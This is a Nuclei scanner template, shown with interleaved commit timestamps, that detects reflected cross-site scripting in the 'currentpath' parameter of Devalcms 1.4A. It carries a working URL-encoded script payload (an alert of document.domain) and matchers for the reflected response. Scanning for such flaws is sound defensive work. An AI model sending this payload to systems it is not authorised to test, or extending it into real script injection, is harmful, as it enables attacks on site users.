nuclei-templates/vulnerabilities/other/devalcms-xss.yaml

35 lines
794 B
YAML
Raw Normal View History

2022-07-20 08:56:54 +00:00
id: devalcms-xss
2022-08-22 07:17:05 +00:00
2022-07-20 08:56:54 +00:00
info:
2022-07-20 09:12:25 +00:00
name: Devalcms 1.4A - Cross-Site Scripting
2022-07-20 08:56:54 +00:00
author: arafatansari
severity: medium
description: |
Devalcms 1.4A is affected by Cross-Site Scripting (rXSS) in the 'currentpath' parameter of the index.php file.
2022-07-20 09:12:25 +00:00
reference:
- https://www.exploit-db.com/exploits/6369
metadata:
verified: true
tags: devalcms,xss,cms,edb
2022-07-20 08:56:54 +00:00
requests:
- method: GET
path:
2022-07-20 09:12:25 +00:00
- '{{BaseURL}}/index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2022-07-20 08:56:54 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-07-20 09:12:25 +00:00
- 'sub menu for: <script>alert(document.domain)</script>'
2022-07-20 08:56:54 +00:00
- type: word
part: header
words:
- text/html
- type: status
status:
2022-07-20 09:07:43 +00:00
- 500